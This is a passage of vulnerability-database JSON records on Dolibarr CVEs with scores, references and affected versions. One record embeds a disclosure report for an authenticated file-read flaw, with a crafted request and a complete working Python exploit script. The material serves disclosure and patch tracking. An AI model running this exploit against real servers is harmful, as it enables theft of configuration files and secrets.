ID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-y4h8-4zpp-qqfn"},{"vulnerability":"VCID-yrys-ch5x-23bv"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@10.0.3"}],"aliases":["CVE-2019-19209","GHSA-jh3j-xfv2-f9m9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8xc8-p2ws-yqar"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21618?format=json","vulnerability_id":"VCID-96w1-vd5e-x7d1","summary":"Dolibarr Core Discloses Sensitive Data via Authenticated Local File Inclusion in selectobject.php\n# Authenticated Local File Inclusion (LFI) via selectobject.php leading to sensitive data disclosure\n\n## Target\n\nDolibarr Core (Tested on version 22.0.4)\n\n## Summary\n\nA Local File Inclusion (LFI) vulnerability has been discovered in the core AJAX endpoint `/core/ajax/selectobject.php`. By manipulating the `objectdesc` parameter and exploiting a fail-open logic flaw in the core access control function `restrictedArea()`, an authenticated user with no specific privileges can read the contents of arbitrary non-PHP files on the server (such as `.env`, `.htaccess`, configuration backups, or logs…).\n\n## Vulnerability Details\n\nThe vulnerability is caused by a critical design flaw in `/core/ajax/selectobject.php` where dynamic file inclusion occurs **before** any access control checks are performed, combined with a fail-open logic in the core ACL function.\n\n- **Arbitrary File Inclusion BEFORE Authorization:** The endpoint parses the `objectdesc` parameter into a `$classpath`. If `fetchObjectByElement` fails (e.g., by providing a fake class like `A:conf/.htaccess:0`), the application falls back to `dol_include_once($classpath)` at **line 71**. At this point, the arbitrary file is included and its content is dumped into the HTTP response buffer. This happens *before* the application checks any user permissions.\n- **Access Control Bypass (Fail-Open):** At **line 102**, the application finally attempts to verify permissions by calling `restrictedArea()`. Because the object creation failed, the `$features` parameter sent to `restrictedArea()` is empty (`''`). Inside `security.lib.php`, if the `$features` parameter is empty, the access check block is completely skipped, leaving the `$readok` variable at `1`. Because of this secondary flaw, the script finishes cleanly with an HTTP 200 OK instead of throwing a 403 error.\n\nThis allows any authenticated user to bypass ACLs and include files. While PHP files cause a fatal error before their code is displayed, the contents of any text-based file (like `.htaccess`, `.env`, `.json`, `.sql`) are dumped into the HTTP response before the application crashes.\n\n## Steps to Reproduce\n\n- Log in to the Dolibarr instance with any user account (no specific permissions required).\n- Intercept or manually forge a GET request to the following endpoint:\n\n```\nGET /core/ajax/selectobject.php?outjson=0&htmlname=x&objectdesc=A:conf/.htaccess:0\n```\n\n- Observe the HTTP response. The contents of the `conf/.htaccess` file will be reflected in the response body right before the PHP Fatal Error message.\n- *(Optional)* Run the attached Python PoC to automate the extraction:\n\n```\npython3 poc.py --url http://target.com --username '<username>' --password '<password>' --file conf/.htaccess\n```\n\n## Impact\n\nAn attacker with minimal access to the CRM can exfiltrate sensitive files from the server. This can lead to the disclosure of environment variables (`.env`), infrastructure configurations (`.htaccess`), installed packages versions, or even forgotten logs and database dumps, paving the way for further attacks.\n\n## Suggested Mitigation\n\n- **Input Validation & Whitelisting:** The `$classpath` must be strictly validated or whitelisted before being passed to `dol_include_once()`.\n- **Execution Flow Correction:** The file inclusion logic must never be executed before the user's authorization has been fully verified.\n- **Enforce Fail-Secure ACLs:** Modify `restrictedArea()` in `core/lib/security.lib.php` so that if the `$features` parameter is empty, access is explicitly denied (`$readok = 0`) instead of allowed by default.\n\n## Disclosure Policy & Assistance\n\nThe reporter is committed to coordinated vulnerability disclosure. This vulnerability, along with the provided PoC, will be kept strictly confidential until a patch is released and explicit authorization for public disclosure is given.\n\nShould any further technical details, logs, or testing of the remediation once a patch has been developed be needed, the reporter is available to assist.\n\nThank you for the time and commitment to securing Dolibarr.\n\nBest Regards,\nVincent KHAYAT (cnf409)\n\n## Video PoC\n\nhttps://github.com/user-attachments/assets/4af80050-4329-4c88-8a54-e2b522deb844\n\n## PoC Script\n\n```python\n#!/usr/bin/env python3\n\"\"\"Dolibarr selectobject.php authenticated LFI PoC\"\"\"\n\nimport argparse\nimport html\nimport re\nimport urllib.error\nimport urllib.parse\nimport urllib.request\nfrom http.cookiejar import CookieJar\n\nLOGIN_MARKERS = (\"Login @\", \"Identifiant @\")\nLOGOUT_MARKERS = (\"/user/logout.php\", \"Logout\", \"Mon tableau de bord\")\n\ndef request(\n    opener, base_url, method, path, params=None, data=None, timeout=15\n):\n    url = f\"{base_url.rstrip('/')}{path}\"\n    if params:\n        url = f\"{url}?{urllib.parse.urlencode(params)}\"\n    payload = urllib.parse.urlencode(data).encode(\"utf-8\") if data else None\n    req = urllib.request.Request(url, method=method.upper(), data=payload)\n    req.add_header(\"User-Agent\", \"dolibarr-lfi-poc/1.0-securitytest-for-dolibarr\")\n    req.add_header(\"Accept\", \"text/html,application/xhtml+xml\")\n    try:\n        with opener.open(req, timeout=timeout) as resp:\n            return resp.status, resp.read().decode(\"utf-8\", errors=\"replace\")\n    except urllib.error.HTTPError as err:\n        return err.code, err.read().decode(\"utf-8\", errors=\"replace\")\n\ndef extract_login_token(page):\n    for pattern in (\n        r'name=[\"\\']token[\"\\']\\s+value=[\"\\']([^\"\\']*)[\"\\']',\n        r'name=[\"\\']anti-csrf-newtoken[\"\\']\\s+content=[\"\\']([^\"\\']*)[\"\\']',\n    ):\n        match = re.search(pattern, page, flags=re.IGNORECASE)\n        if match:\n            return match.group(1)\n    return \"\"\n\ndef looks_authenticated(body):\n    return any(marker in body for marker in LOGOUT_MARKERS)\n\ndef clean_included_output(body):\n    for marker in (\n        \"<br />\\n<b>Warning\",\n        \"<br />\\r\\n<b>Warning\",\n        \"<br />\\n<b>Fatal error\",\n        \"<br />\\r\\n<b>Fatal error\",\n    ):\n        pos = body.find(marker)\n        if pos != -1:\n            return body[:pos].rstrip()\n    return body.rstrip()\n\ndef login(opener, base_url, username, password):\n    code, login_page = request(opener, base_url, \"GET\", \"/\")\n    if code >= 400:\n        return False, f\"HTTP {code} on login page\"\n    token = extract_login_token(login_page)\n    code, after_login = request(\n        opener,\n        base_url,\n        \"POST\",\n        \"/index.php?mainmenu=home\",\n        data={\n            \"token\": token,\n            \"actionlogin\": \"login\",\n            \"loginfunction\": \"loginfunction\",\n            \"username\": username,\n            \"password\": password,\n        },\n    )\n    if code >= 400:\n        return False, f\"HTTP {code} on login request\"\n    if looks_authenticated(after_login):\n        return True, \"\"\n    code, home = request(opener, base_url, \"GET\", \"/index.php?mainmenu=home\")\n    if code < 400 and looks_authenticated(home):\n        return True, \"\"\n    return False, \"Invalid username or password\"\n\ndef read_file(opener, base_url, relative_path):\n    status, body = request(\n        opener,\n        base_url,\n        \"GET\",\n        \"/core/ajax/selectobject.php\",\n        params={\n            \"outjson\": \"0\",\n            \"htmlname\": \"x\",\n            \"objectdesc\": f\"A:{relative_path}:0\",\n        },\n    )\n    if any(marker in body for marker in LOGIN_MARKERS) and not looks_authenticated(body):\n        raise RuntimeError(\"Session expired or not authenticated\")\n    return status, body, clean_included_output(body)\n\ndef parse_args():\n    parser = argparse.ArgumentParser(\n        description=\"Authenticated LFI PoC against /core/ajax/selectobject.php (Dolibarr 22.0.4).\"\n    )\n    parser.add_argument(\n        \"--url\",\n        default=\"http://127.0.0.1:8080\",\n        help=\"Dolibarr base URL (default: http://127.0.0.1:8080)\",\n    )\n    parser.add_argument(\"--username\", required=True, help=\"Dolibarr username\")\n    parser.add_argument(\"--password\", required=True, help=\"Dolibarr password\")\n    parser.add_argument(\n        \"--file\",\n        dest=\"target_file\",\n        required=True,\n        help=\"Target file to read (e.g. conf/.htaccess).\",\n    )\n    return parser.parse_args()\n\ndef print_result(path, status, raw, clean):\n    print(f\"\\n[+] HTTP status: {status}\")\n    print(f\"[+] Requested file: {path}\")\n    print(\"=\" * 80)\n    if clean:\n        print(html.unescape(clean))\n    else:\n        print(\"(No readable output extracted)\")\n    print(\"=\" * 80)\n    if clean != raw.rstrip():\n        print(\"[i] PHP warnings/fatal output were trimmed from display.\")\n\ndef summarize_error_body(body, limit=1200):\n    text = html.unescape(body).strip()\n    if not text:\n        return \"(Empty response body)\"\n    if len(text) > limit:\n        return text[:limit].rstrip() + \"\\n... [truncated]\"\n    return text\n\ndef main():\n    args = parse_args()\n    opener = urllib.request.build_opener(\n        urllib.request.HTTPCookieProcessor(CookieJar())\n    )\n    ok, reason = login(opener, args.url, args.username, args.password)\n    if not ok:\n        print(f\"[!] {reason}\")\n        return 1\n    print(\"[+] Login successful.\")\n    try:\n        status, raw, clean = read_file(opener, args.url, args.target_file)\n        if status >= 400:\n            print(f\"[!] HTTP {status} while reading target file.\")\n            print(\"=\" * 80)\n            print(summarize_error_body(raw))\n            print(\"=\" * 80)\n            return 1\n        print_result(args.target_file, status, raw, clean)\n        return 0\n    except Exception as exc:\n        print(f\"[!] Error: {exc}\")\n        return 1\n\nif __name__ == \"__main__\":\n    try:\n        raise SystemExit(main())\n    except KeyboardInterrupt:\n        print(\"\\nInterrupted.\")\n        raise SystemExit(130)\n```","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34036","reference_id":"","reference_type":"","scores":[{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03195","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34036"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:14Z/"}],"url":"https://github.com/Dolibarr/dolibarr/commit/743c22e57c0b2a017d6b92bec865d71ce6177a6a"},{"reference_url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T13:57:14Z/"}],"url":"https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-2mfj-r695-5h9r"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34036","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34036"},{"reference_url":"https://github.com/advisories/GHSA-2mfj-r695-5h9r","reference_id":"GHSA-2mfj-r695-5h9r","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-2mfj-r695-5h9r"}],"fixed_packages":[],"aliases":["CVE-2026-34036","GHSA-2mfj-r695-5h9r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-96w1-vd5e-x7d1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/55257?format=json","vulnerability_id":"VCID-9v1w-ayuw-wbhy","summary":"Dolibarr arbitrary commands execution\nThe admin panel in Dolibarr before 7.0.2 might allow remote attackers to execute arbitrary commands by leveraging support for updating the antivirus command and parameters used to scan file uploads.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-10092","reference_id":"","reference_type":"","scores":[{"value":"0.00426","scoring_system":"epss","scoring_elements":"0.62561","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-10092"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/5d121b2d3ae2a95abebc9dc31e4782cbc61a1f39","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/5d121b2d3ae2a95abebc9dc31e4782cbc61a1f39"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-10092","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-10092"},{"reference_url":"https://sysdream.com/news/lab/2018-05-21-cve-2018-10092-dolibarr-admin-panel-authenticated-remote-code-execution-rce-vulnerability","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://sysdream.com/news/lab/2018-05-21-cve-2018-10092-dolibarr-admin-panel-authenticated-remote-code-execution-rce-vulnerability"},{"reference_url":"http://www.openwall.com/lists/oss-security/2018/05/21/2","reference_id":"","reference_type":"","scores":[{"value":"8.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://www.openwall.com/lists/oss-security/2018/05/21/2"},{"reference_url":"https://github.com/advisories/GHSA-6j62-m2vv-wc3m","reference_id":"GHSA-6j62-m2vv-wc3m","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6j62-m2vv-wc3m"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112143?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-7khd-yhd5-6ydu"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2"}],"aliases":["CVE-2018-10092","GHSA-6j62-m2vv-wc3m"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9v1w-ayuw-wbhy"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/62428?format=json","vulnerability_id":"VCID-bdx3-aeus-qkh7","summary":"Dolibarr SQL injection via the integer parameters qty and value_unit\nAn issue was discovered in Dolibarr through 7.0.0. expensereport/card.php in the expense reports module allows SQL injection via the integer parameters qty and value_unit.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-16809","reference_id":"","reference_type":"","scores":[{"value":"0.00707","scoring_system":"epss","scoring_elements":"0.72487","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-16809"},{"reference_url":"https://github.com/Dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr"},{"reference_url":"https://github.com/Dolibarr/dolibarr/issues/9449","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/issues/9449"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-16809","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-16809"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/180056?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1247-tc3p-g3d2"},{"vulnerability":"VCID-17fx-qrxs-kbhk"},{"vulnerability":"VCID-1qq7-1tkv-kqd3"},{"vulnerability":"VCID-1xws-6qbv-c7h4"},{"vulnerability":"VCID-2s1r-jffc-dqc7"},{"vulnerability":"VCID-39gm-mkxs-1uf9"},{"vulnerability":"VCID-3tfr-z5d3-hfhf"},{"vulnerability":"VCID-3uay-6w6g-yfaw"},{"vulnerability":"VCID-44xf-5xjn-juas"},{"vulnerability":"VCID-4925-ueg7-63dy"},{"vulnerability":"VCID-5vtj-mm9d-ukbf"},{"vulnerability":"VCID-5w7u-vtjw-fbck"},{"vulnerability":"VCID-6fbp-syak-2qgu"},{"vulnerability":"VCID-6j9z-c2a6-xyhn"},{"vulnerability":"VCID-6v7h-3zbv-eqgt"},{"vulnerability":"VCID-79rb-ssqd-5qd3"},{"vulnerability":"VCID-7ee4-1bfq-efd3"},{"vulnerability":"VCID-8xc8-p2ws-yqar"},{"vulnerability":"VCID-96w1-vd5e-x7d1"},{"vulnerability":"VCID-9v1w-ayuw-wbhy"},{"vulnerability":"VCID-e3km-aqns-kkb4"},{"vulnerability":"VCID-e6hj-wmum-tygv"},{"vulnerability":"VCID-enqn-xkv2-nuf5"},{"vulnerability":"VCID-exs6-buy9-zfcn"},{"vulnerability":"VCID-fd5f-b8q5-ayf5"},{"vulnerability":"VCID-fvp2-wtsw-y7ee"},{"vulnerability":"VCID-ggum-7ajh-nkdn"},{"vulnerability":"VCID-j1fh-3p2s-bfgk"},{"vulnerability":"VCID-j4d1-8q47-uqc4"},{"vulnerability":"VCID-jrxu-cz7p-3uhe"},{"vulnerability":"VCID-kvcg-cuxk-tbbk"},{"vulnerability":"VCID-m2e3-q7zb-uuhh"},{"vulnerability":"VCID-ng17-k6q4-qfhe"},{"vulnerability":"VCID-q3dz-magb-4kd5"},{"vulnerability":"VCID-qdmw-vqe3-7kfk"},{"vulnerability":"VCID-rhud-xhwf-mqew"},{"vulnerability":"VCID-s6he-mw9s-nbba"},{"vulnerability":"VCID-s6v7-8pq8-nyez"},{"vulnerability":"VCID-s9rz-z4dd-rkhm"},{"vulnerability":"VCID-t7pd-jyds-3ka5"},{"vulnerability":"VCID-tcmr-1whv-tqhh"},{"vulnerability":"VCID-ty2n-5vns-abgk"},{"vulnerability":"VCID-uc33-xses-ykft"},{"vulnerability":"VCID-uzvh-dkqr-8ubf"},{"vulnerability":"VCID-v437-y5bb-nudu"},{"vulnerability":"VCID-vhht-9j9w-5bhr"},{"vulnerability":"VCID-w7kv-4ajd-7ke6"},{"vulnerability":"VCID-w8pm-m6yc-5bfb"},{"vulnerability":"VCID-wa9k-affu-zuen"},{"vulnerability":"VCID-whjj-q5zp-tfef"},{"vulnerability":"VCID-x3pg-81y2-ruga"},{"vulnerability":"VCID-xuha-w2yw-5fa6"},{"vulnerability":"VCID-yrys-ch5x-23bv"},{"vulnerability":"VCID-zve5-afaq-mkh8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.1"}],"aliases":["CVE-2018-16809","GHSA-h34q-878w-w96r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bdx3-aeus-qkh7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50498?format=json","vulnerability_id":"VCID-e3km-aqns-kkb4","summary":"Logic error in dolibarr/dolibarr\nIn dolibarr/dolibarr prior to 16.0 any low privileged users could update their login name which should only be updated by admin.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0746","reference_id":"","reference_type":"","scores":[{"value":"0.00215","scoring_system":"epss","scoring_elements":"0.44028","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0746"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/4973019630d51ad76b7c1a4141ec7a33053a7d21","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/4973019630d51ad76b7c1a4141ec7a33053a7d21"},{"reference_url":"https://huntr.dev/bounties/b812ea22-0c02-46fe-b89f-04519dfb1ebd","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/b812ea22-0c02-46fe-b89f-04519dfb1ebd"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0746","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0746"},{"reference_url":"https://github.com/advisories/GHSA-8vq6-5f66-hp3r","reference_id":"GHSA-8vq6-5f66-hp3r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8vq6-5f66-hp3r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/86726?format=json","purl":"pkg:composer/dolibarr/dolibarr@16.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5r6g-nb9m-43h1"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0"}],"aliases":["CVE-2022-0746","GHSA-8vq6-5f66-hp3r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-e3km-aqns-kkb4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/55195?format=json","vulnerability_id":"VCID-e6hj-wmum-tygv","summary":"Dolibarr ERP and CRM Code Injection\nDolibarr ERP/CRM 9.0.1 provides a module named website that provides for creation of public websites with a WYSIWYG editor. It was identified that the editor also allowed inclusion of dynamic code, which can lead to code execution on the host machine. An attacker has to check a setting on the same page, which specifies the inclusion of dynamic content. Thus, a lower privileged user of the application can execute code under the context and permissions of the underlying web 